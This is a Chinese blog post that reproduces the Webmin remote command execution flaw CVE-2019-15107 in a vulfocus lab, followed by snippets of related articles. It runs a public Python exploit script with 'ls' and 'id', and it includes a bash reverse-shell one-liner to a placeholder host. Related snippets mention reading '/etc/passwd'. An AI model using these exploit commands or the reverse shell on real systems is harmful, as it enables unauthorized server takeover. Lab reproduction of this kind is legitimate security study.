webmin 远程命令执行 (CVE-2019-15107)复现

最新推荐文章于 2025-01-19 15:59:14 发布
最新推荐文章于 2025-01-19 15:59:14 发布
阅读量1.3k 收藏 4
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: 前端 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouthBelief/article/details/121263652
本文详细介绍了Webmin的一个严重漏洞CVE-2019-15107,该漏洞允许攻击者在未授权的情况下执行任意命令。漏洞影响Webmin版本小于等于1.920。通过发送特定的POST请求,攻击者可以触发命令执行,包括反弹shell。为修复此漏洞,建议升级到Webmin的最新版本。

Webmin漏洞

所有文章,仅供安全研究与学习之用,后果自负!

前言

Webmin是Webmin社区的一套基于Web的用于类Unix操作系统中的系统管理工具。

webmin 远程命令执行 (CVE-2019-15107)

0x01 漏洞描述

Webmin是一套基于Web的用于类Unix操作系统中的系统管理工具。 当用户开启Webmin密码重置功能后,攻击者可以通过发送POST请求在目标系统中执行任意命令,且无需身份验证。

0x02 影响范围

Webmin <= 1.920

0x03 漏洞复现

(1)访问靶场
在这里插入图片描述
要求使用https访问
(2)
在这里插入图片描述

(3)脚本利用
python2 运行

https://github.com/jas502n/CVE-2019-15107

命令执行

python CVE_2019_15107.py https://vulfocus.fofa.so:16241 "ls /tmp"

在这里插入图片描述
id

 python CVE_2019_15107.py https://vulfocus.fofa.so:20763 "id"

在这里插入图片描述

反弹shell

bash -c "bash -i >& /dev/tcp/x.x.x.x/8888 0>&1"

用bpurl编码

在这里插入图片描述

python2 CVE_2019_15107.py  https://vulfocus.fofa.so:26004 "编码后的命令"

脚本执行情况如下
在这里插入图片描述

反弹shell成功

在这里插入图片描述

0x04 漏洞修复

升级到最新版本

webmin远程命令执行漏洞(CVE-2019-15107)
weixin_51387754的博客
10-22 2157
简介(what and why) Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作 http://www.webmin.com/ Webmin 是一个用 Perl 编写的基于浏览器的管理应用程序。 是一个基于Web的界面,用于Unix的系统管理。使用任何支持表和表单的浏览器,可以设置用户帐户,Apache,DNS,文件共享等。 HOW:Linux系统因其高效稳定而受到广大用户的推崇与青睐,然后其管理有一定复杂性和学习周期。为了
Webmin 远程命令执行漏洞(CVE-2019-15107
m0_57206390的博客
10-25 770
Webmin是一个用于管理类Unix系统的管理配置工具,具有Web页面。 该漏洞由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞,该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码。
Webmin 远程命令执行漏洞(CVE-2019-15107复现
最新发布
m0_61468705的博客
01-19 472
该漏洞由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞,该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码版本满足要求,且服务器的配置文件允许修改密码时,在不知道webmin的用户和密码条件下,可以任意执行代码。https://www.secsnow.cn/snowlab/2d9748be-3184-4ede-bf9c-f98514ba021c/打开题目环境后抓包请求以下payload,需要注意的点是需要带Referer字段,不然无法进行修改密码。POST/pass
webmin 远程命令执行CVE-2019-15107)漏洞复现
weixin_42675091的博客
09-06 672
webmin 远程命令执行CVE-2019-15107)漏洞复现
漏洞复现——Webmin 远程命令执行CVE-2019-15107
lay77的博客
10-12 412
Webmin是一款基于Web的远程管理工具,该工具存在一个远程命令执行漏洞(CVE-2019-15107)。攻击者可以通过特制的请求,未经身份验证的情况下执行任意命令,并可能导致服务器被完全控制。禁用或限制Webmin远程访问,仅允许访问来自受信任的IP地址。尽快更新Webmin版本至1.930或更高版本,以修复该漏洞。配置Web服务器强制使用HTTPS加密连接,并使用安全证书。使用防火墙规则,限制对Webmin的访问仅来自内部网络。Webmin版本:1.920及之前的版本。此漏洞报告无附带文件。
CVE-2019-15642:Webmin远程执行代码(已认证)
03-10
CVE-2019-15642 Webmin远程执行代码(已认证) python用法: python CVE-2019-15642.py https://xxx.xxx.xxx:10000 "cat /etc/passwd" Webmin的0x01泊坞窗 cd ~/vulhub/webmin/CVE-2019-15107 docker-compose up -...
Webmin 远程命令执行漏洞(CVE-2019-15107)漏洞复现
s1056481432的博客
08-19 1359
漏洞介绍 Webmin是一个用于管理类Unix系统的管理配置工具,具有Web页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可 以执行任意系统命令。 漏洞环境 在vulhub执行如下命令,启动webmin 1.910: docker-compose up -d 执行完成后,访问https://your-ip:10000,忽略证书后即可看到webmin的登录页面。 漏洞复现 参考链接中的数据包是不对的,经过阅读代码可知,只有在发送的user参数的值不是已知Linux用户的情况
【漏洞复现Webmin 远程命令执行(CVE-2019-15107)
过期的秋刀鱼
11-05 1049
1.900 到 1.920版本的用户,编辑Webmin配置文件:/etc/webmin/miniserv.conf,注释或删除“passwd_mode=”行,然后运行/etc/webmin/restart 重启服务命令。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。直接访问https://your-ip:10000/password_change.cgi。上面poc需要注意:ip改成自己的ip,然后user参数不能是系统账户,后面接执行的命令。
【漏洞复现-webmin-命令执行】vulfocus/webmin-cve_2019_15107
10-14 2301
webmin-命令执行】无需身份验证接口
CVE-2019-15107Webmin远程命令执行漏洞复现
qq_51459600的博客
01-04 3846
CVE-2019-15107 Webmin远程命令执行漏洞复现 漏洞影响版本为Webmin<=1.920 Webmin的是一个用于管理类Unix的系统的管理配置工具,具有网络页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。它已知在端口10000上运行。在重置密码功能中发现了一个错误,该错误允许恶意第三方由于缺少输入验证而执行恶意代码。 环境搭建 靶机:CentOS7(192.168.2.101) webmin在ssl模式下是无法显示界面的,我
webmin远程命令执行漏洞(cve-2019-15107)深入分析
whatday的专栏
06-27 2375
漏洞描述 近日Webmin被发现存在一处远程命令执行漏洞,经过分析后,初步猜测其为一次后门植入事件。 Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。据统计,互联网上大约有13w台机器使用Webmin。当用户开启Webmin密码重置功能后,攻击者可以通过发送POST请求在目标系统中执行任意命令,且无需身份验证。 漏洞分析 首先分析msf给出的插件 根据插件,还原出poc如下: 当poc执行后,会向p.
Webmin 远程命令执行漏洞_CVE-2019-15107
weixin_42786460的博客
10-14 485
Webmin 远程命令执行漏洞_CVE-2019-15107
【漏洞复现Webmin 远程命令执行漏洞(CVE-2019-15107)
weixin_43486390的博客
01-20 994
0x01 概述 Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。在其版本为1.882到1.920存在CVE-2019-15107漏洞,当版本为1.890时,工具在默认配置下易受漏洞的威胁,而在其它版本当用户开启密码过期策略时,受该漏洞威胁,漏洞主要是起代码中引用‘qx/ /’方法,把密码字符串当作命令执行。 0x02 影响版本 webmin=1.882-1.920 条件:除1.890版本,其余受影响的版本的服务器的配置文件允
Webmin命令执行(CVE-2020-35606)
m0_65150886的博客
01-31 940
WebminWebmin社区的一套基于Web的用于类Unix操作系统中的系统管理工具。Webmin 1.962版本及之前版本存在安全漏洞,该漏洞允许执行任意命令。任何被授权使用Package Updates模块的用户都可以使用根权限通过包含和的向量执行任意命令。账户密码:root:password。使用前注意修改py文件中的121行的目标端口号和122行的监听端口号。://ip:port,出现如下页面,开始实验。3.下载exp,并修改文件内容。
Webmin (CVE-2019-15107) 远程命令执行漏洞复现
来日可期的博客
10-13 1663
Webmin是一个用于管理类Unix系统的管理配置工具,具有Web页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。访问https://127.0.0.1:10000/password_change.cgi。然后发送数据包后,可以看到在页面的回显中,出现了我们插入的id命令的结果。还可以使用HackBar,发送POST请求包,并添加攻击Payload。访问靶场地址https://127.0.0.1:10000/漏洞影响版本为Webmin
webmin 远程代码执行 (CVE-2019-15642)
weixin_42675091的博客
09-05 611
webmin 远程代码执行 (CVE-2019-15642)
CVE-2019-15107
公众号shadow sock7
08-19 1402
漏洞存在于webmin的重置密码功能处,(但是默认重置密码功能并未开启)。只需要用|就可以进行命令执行: shodan上全球有14000多 shodan上中国的只有78 参考: https://blog.firosolutions.com/exploits/webmin/ https://www.reddit.com/r/netsec/comments/crk77z/0day_remote_...
Webmin后门漏洞CVE-2019-15107Python利用方法
总结来说,CVE-2019-15107是一个存在于Webmin系统管理工具中的远程代码执行漏洞,可以被攻击者利用来获取服务器的控制权。该漏洞可以通过Metasploit模块和特定的Python脚本利用,但使用这些工具必须遵循法律和道德...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值